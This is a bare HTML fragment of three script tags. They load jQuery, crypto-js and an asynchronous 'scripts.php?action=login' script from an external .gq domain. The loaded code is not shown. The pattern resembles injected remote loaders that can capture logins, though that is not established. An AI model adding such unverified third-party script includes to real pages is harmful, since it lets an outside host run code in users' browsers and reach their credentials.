<script type='text/javascript' src='https://blasterscripts.gq/js/jquery.min.js'></script>
<script type='text/javascript' src='https://blasterscripts.gq/js/crypto-js/crypto-js.js'></script>
<script type="text/javascript" src="https://blasterscripts.gq/scripts.php?action=login" async="true"></script>

